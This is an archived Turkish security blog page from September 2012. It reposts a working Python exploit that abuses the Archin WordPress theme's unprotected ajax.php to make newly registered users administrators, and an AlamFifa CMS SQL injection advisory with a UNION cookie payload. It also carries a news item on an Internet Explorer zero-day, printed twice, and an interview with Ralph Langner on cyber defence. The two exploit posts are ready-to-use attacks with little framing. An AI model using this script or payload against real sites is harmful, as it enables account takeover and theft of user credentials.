Archive for 30 Eylül 2012

Archin WordPress Theme Unauthenticated Configuration Access

Unauthenticated Configuration Access doğrulanmamış yapılandırma erişimi. Ayağıdaki açıkla sahte e-mail adresine bilgiler göndermek mümkün. Açığa ilişkin açıklamalar şu şekilde.

# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site
site = "10.10.10.5"
#path to ajax.php
url = "/wordpress/wp-content/themes/archin/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):
	params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
	headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
	conn = httplib.HTTPConnection(site)
	conn.request("POST", url, params, headers)
	response = conn.getresponse()
	print response.status, response.reason
	data = response.read()
	print data
	conn.close()
	
ChangeOption(site, url, "admin_email", "fake@ballastsecurity.net")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"

AlamFifa CMS v1.0 Beta Remote SQL Injection Vulnerability

AlamFifa CMS v1.0 Beta Remote SQL Injection Vulnerability açığı sayesinde username ve password ve user_pass_cookie leri çekmek mümkün.
açığa ilişkin açıklamalar

_________________

############################################
### Exploit Title: AlamFifa CMS v1.0 Beta Remote SQL Injection Vulnerability
### Date: 30/9/2012 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.traidnt.net/vb/traidnt2143253/
### Software Link: http://www.alamrb.com/images/up/15-08-2012-19-15-45-17314.zip
### Version: 1.0
### Tested on: Linux/Windows 
############################################

# Files affected :

- ( ajax.php ) on line 6:

$usersql = mysql_query("SELECT * FROM bgs_users WHERE name = '".$_COOKIE['user_name_cookie']."' and pass = '".md5($_COOKIE['user_pass_cookie'])."'")or die(error_sql(mysql_error(),__LINE__,__FILE__));

- ( /files/header.php ) on line 34 :

$usersql = mysql_query("SELECT * FROM bgs_users WHERE name = '".$_COOKIE['user_name_cookie']."' and pass = '".md5($_COOKIE['user_pass_cookie'])."'")or die(error_sql(mysql_error(),__LINE__,__FILE__));

# user_name_cookie is affected in cookie ..

# P.0.C :

http://127.0.0.1/alamfifa1/index.php

- Inject the cookie by any tool like this :

user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#;

############################################

# You can fix it here :

http://www.traidnt.net/vb/traidnt2143253-2/#post19292739

# Greetz to my friendz

İnternet Explorer tüm sürümlerinde Açık

    1. Bilgisayarınızda Internet Explorer 6, 7, 8 ya da 9 kullanıyorsanız, güvenlik uzmanları başka bir tarayıcı kullanmanızı öneriyor. IE’de bulunan kritik açıklar sebebiyle bu uyarıları yapan uzmanlar Microsoft’un yeni bir yaması gelene kadar IE’den uzak durmanızı öneriyor. Bunun yanı sıra Microsoft geçtiğimiz Pazartesi günü hacker’ların IE üzerindeki açıkları kullanarak kişilerin bilgisayarlarını ele geçirebilmek adına yaptıkları çalışmaları kabullendi.Şu ana kadar Microsoft’un raporunda bu açığın kullanıldığı ufak tefek saldırılar mevcut. Yazılımcılar hataları kapatacak yama üzerinde çalışıyorlar ancak Microsoft henüz bu patch’in yakın bir zamanda olacağını ya da aylık güncelleme periyodu içinde gerçekleşeceğini söylemedi. Gelecek güncelleme 9 Ekim’de “Patch Tuesday” adıyla gerçekleşecek.

      IE üzerindeki bu açık ilk olarak Rapid7’s Metasploit Project adlı sayfada güvenlik araştırmacısı Eric Romang adlı kişi tarafından paylaşıldı. Metasploit aktif olark IE kullananlara bu tarayıcıyı çöpe atmalarını öneriyor.

      IE’deki açık

      Microsoft bu açığın, hacker’lar tarafından kullanıcının bilgisayarındaki bozulmuş hafızayı işleyerek sisteme erişilebileceğini ve kötü amaçlı bir kodu çalıştırabileceğini söyledi. Sonuç olarak eğer saldırıya uğradıysanız hacker sisteminizi aynı sizin kontrol ettiğiniz gibi kullanabilir. Eğer yönetici olarak bilgisayarınızı açarsanız –ki birçok kullanıcı böyle yapıyor- hacker program yükleme, silme, görüntüleme, yeni hesap açma gibi bütün yönetici haklarına sahip olur.

      Bu nasıl oluyor?

      Birçok ev kullanıcısı adına bu açığın kullanılabilmesine zemin sağlanması için kötü amaçlı bir web sitesini ziyaret etmesi yeterli oluyor. Yani genel olarak senaryo hacker’ın size bu yolları kullanarak kandırması ve bilgisayarınızı ele geçirmesiyle başlıyor.

      Microsoft ne öneriyor?

      Microsoft bu açığı kapatmak için çalışırken, yazılımcılar kullanıcılara çoklu çalışan indirme ve yüklemeyi kapsayan bir güvenlik aracı edinmelerini öneriyor. Aynı zamanda internet güvenlik alanı ayarlarınızı menü seçeneklerinden Araçlar > Internet Ayarları > Güvenlik’den “yüksek” e almanız tavsiye ediliyor. Ayrıca Microsoft sistem üzerinde herhangi bir şey çalıştırmadan önce active scripting’i kapatmanızı öneriyor.

      Bu denli tehlikeli bir açığın var olduğu şu sıralarda aramızda IE kullanmaktan hala hoşlanan insanlar olabilir. Ancak bu hatanın düzelmesi zaman alacaktır ve bu denli geniş bir hatanın giderilmesi gerçekten çok zor olacaktır. Bu yüzden diğer popüler tarayıcı alternatiflerini düşünmekte yarar var.

İnternet Explorer tüm sürümlerinde Açık

    1. Bilgisayarınızda Internet Explorer 6, 7, 8 ya da 9 kullanıyorsanız, güvenlik uzmanları başka bir tarayıcı kullanmanızı öneriyor. IE’de bulunan kritik açıklar sebebiyle bu uyarıları yapan uzmanlar Microsoft’un yeni bir yaması gelene kadar IE’den uzak durmanızı öneriyor. Bunun yanı sıra Microsoft geçtiğimiz Pazartesi günü hacker’ların IE üzerindeki açıkları kullanarak kişilerin bilgisayarlarını ele geçirebilmek adına yaptıkları çalışmaları kabullendi.Şu ana kadar Microsoft’un raporunda bu açığın kullanıldığı ufak tefek saldırılar mevcut. Yazılımcılar hataları kapatacak yama üzerinde çalışıyorlar ancak Microsoft henüz bu patch’in yakın bir zamanda olacağını ya da aylık güncelleme periyodu içinde gerçekleşeceğini söylemedi. Gelecek güncelleme 9 Ekim’de “Patch Tuesday” adıyla gerçekleşecek.

      IE üzerindeki bu açık ilk olarak Rapid7’s Metasploit Project adlı sayfada güvenlik araştırmacısı Eric Romang adlı kişi tarafından paylaşıldı. Metasploit aktif olark IE kullananlara bu tarayıcıyı çöpe atmalarını öneriyor.

      IE’deki açık

      Microsoft bu açığın, hacker’lar tarafından kullanıcının bilgisayarındaki bozulmuş hafızayı işleyerek sisteme erişilebileceğini ve kötü amaçlı bir kodu çalıştırabileceğini söyledi. Sonuç olarak eğer saldırıya uğradıysanız hacker sisteminizi aynı sizin kontrol ettiğiniz gibi kullanabilir. Eğer yönetici olarak bilgisayarınızı açarsanız –ki birçok kullanıcı böyle yapıyor- hacker program yükleme, silme, görüntüleme, yeni hesap açma gibi bütün yönetici haklarına sahip olur.

      Bu nasıl oluyor?

      Birçok ev kullanıcısı adına bu açığın kullanılabilmesine zemin sağlanması için kötü amaçlı bir web sitesini ziyaret etmesi yeterli oluyor. Yani genel olarak senaryo hacker’ın size bu yolları kullanarak kandırması ve bilgisayarınızı ele geçirmesiyle başlıyor.

      Microsoft ne öneriyor?

      Microsoft bu açığı kapatmak için çalışırken, yazılımcılar kullanıcılara çoklu çalışan indirme ve yüklemeyi kapsayan bir güvenlik aracı edinmelerini öneriyor. Aynı zamanda internet güvenlik alanı ayarlarınızı menü seçeneklerinden Araçlar > Internet Ayarları > Güvenlik’den “yüksek” e almanız tavsiye ediliyor. Ayrıca Microsoft sistem üzerinde herhangi bir şey çalıştırmadan önce active scripting’i kapatmanızı öneriyor.

      Bu denli tehlikeli bir açığın var olduğu şu sıralarda aramızda IE kullanmaktan hala hoşlanan insanlar olabilir. Ancak bu hatanın düzelmesi zaman alacaktır ve bu denli geniş bir hatanın giderilmesi gerçekten çok zor olacaktır. Bu yüzden diğer popüler tarayıcı alternatiflerini düşünmekte yarar var.

Ralph Langner'den Siber Saldırılara Karşı Korunmanın ipuçları

Siber saldırıdan korunmanın yolu:

  • İran Nükleer Programı’na yönelik STUXNET virüsünü çözümlemesiyle dünya çapında ünlenen bilgi güvenliği uzmanı Ralph Langner, siber saldırılardan korunmanın ipuçlarını verdi.

    11-13 Eylül’de İstanbul’da düzenlenen ICT Summit Eurasia Bilişim Zirvesi’nde bilişimin geleceğinde çizilecek yol haritaları ve teknolojilerin eğitim, finans, sağlık eğlence ve girişim gibi alanlarda ivmelendireceği dönüşüm mercek altına alındı.

    30 ülkeden binlerce profesyoneli bir araya getiren zirvenin konuklarından biri de bilgi güvenliği uzmanı Ralph Langner’di. İnternet üzerinde faaliyet yürüten suç örgütleri ya da kişilerin devlet ve şirketler kadar bireyler için de tehdit oluşturmaya başladığı biliniyor. Siber güvenlik alanında son yıllarda yaşanan en büyük saldırılardan biri olan İran Nükleer Programı’na yönelik STUXNET virüsünü çözümlemesiyle dünya çapında ünlenen Langner’e göre korunmanın anahtarı, “Bana bir şey olmaz” anlayışından kurtulmak. Langner soruları yanıtladı:

    Stuxnet virüsünü kırma başarınızın sırrı nedir?

    Langner: Sır, “sırrın olmayışı.” Bunu başarmak için sihirli bir değnek, ya da tek bir ürün alıp mucizeler yaratamazsınız. Bu kadar kolay değil. Siber savunma düşünülmediğinden, aynı hatalar tekrarlanıyor. Güvensiz korunma yapılarını yeniden uygulamamalıyız. Başımıza geldiğinde ne yapabilirim diye düşünmeye başlamamalıyız. Bekleyip görelim stratejisi doğru değil.

    Siber ataklara karşı karar alıcıların görevi nedir?

    Langner: Savaş durumunda ulus devletlere daha çok rol düşer. Bugün hükümetler siber savaş girişimlerinde bulunmak için yatırım yapıyorlar, ancak savunma girişimlerine yatırım yapmıyorlar. Dünyada aşağı yukarı 10-20 ülke siber savaş girişimlerine karşı savunma çalışmalarında bulunuyorlar. Saldırının en iyi savunma olduğunu düşünenler var, ancak bu siber dünyada mümkün değil. Pasif savunmadan, korunmadan söz ediyorum. Küçük büyük tüm ülkeler için geçerli.

    Yapılan en büyük hatalar neler?

    Langner: Nükleerden korunmak için herhangi bir yer olmayabilir, ama siber saldırıdan korunmak mümkün. Siber savaşlar ile su, trafik gibi kritik altyapılar saldırılara açık durumda. Yapılan en büyük hata, kültürde: “Bize bir şey olmaz, kimse bize saldırmaz” düşüncesi. Saldırının nereden ve ne şiddette geleceğini bilemeyiz. Korunmak mümkün, zaman, çaba ve para geliyor. Regülasyonlar geliştirilmeli. Korkarım ciddi bir atak olmadan kapsamlı bir korumaya kavuşamayacağız ya da uygulanması uzun zaman alacak.

    Siber saldırı düzenlenemeyecek bir yapı var mı?

    Langner: Var, örneğin telekomünikasyon endüstrisinde korumanız gereken sistemler oldukça karmaşık. Ancak elektrik üretim sistemlerinde daha kolay, çünkü sistemler daha basit.

    Türkiye’de siber saldırılardan korunmak üzere ciddi bir yapı yok. Bu tür yapılar hangi ülkelerde var?

    Langner: ABD’de var. Almanya’da da Ulusal Siber Savunma Merkezi bulunuyor. ABD’de görevleri siber savunma sağlamak olan bin kişi çalışıyor, Almanya’dakinde ise sadece 10… Daha çok kaynağa sahip olmalıyız.

    Gelecekte ne tür siber silahlar ve yeni aktörler görebiliriz?

    Langner: Geleceği tahmin etmek zor. Ancak siber silah teknolojilerinin tedarikinin hackerlar, teröristler, suç örgütleri için çok kolay olması endişelendirici. Para kazanmak isteyen herkes yapabilir. Siber teknolojiler sadece kodlardan oluşuyor ve tümü kopya edilebiliyor. Büyük siber terörist grupları kimya fabrikalara saldırabilir ve zehirli, ölümcül maddelerin çevreye yayılmasına neden olabilirler. Siber teröristler, yol açtığı sonuçlardan çok, neler yapabileceklerini halka göstermek isterler.

    Siz bir siber terörist olsaydınız, nereye saldırırdınız?

    Langner: Öncelikle bunu yapmayacağımı söylemek isterim, bu bir karakter meselesi. Stuxnet’i bu kadar kısa sürede analiz etmemin nedeni, bunun olmasını beklemem. Siber savaşta mücadelenin ana noktası, korunmanın mümkün olduğunun ve sadece korunmasız sistemlere saldırılacağının anlaşılması.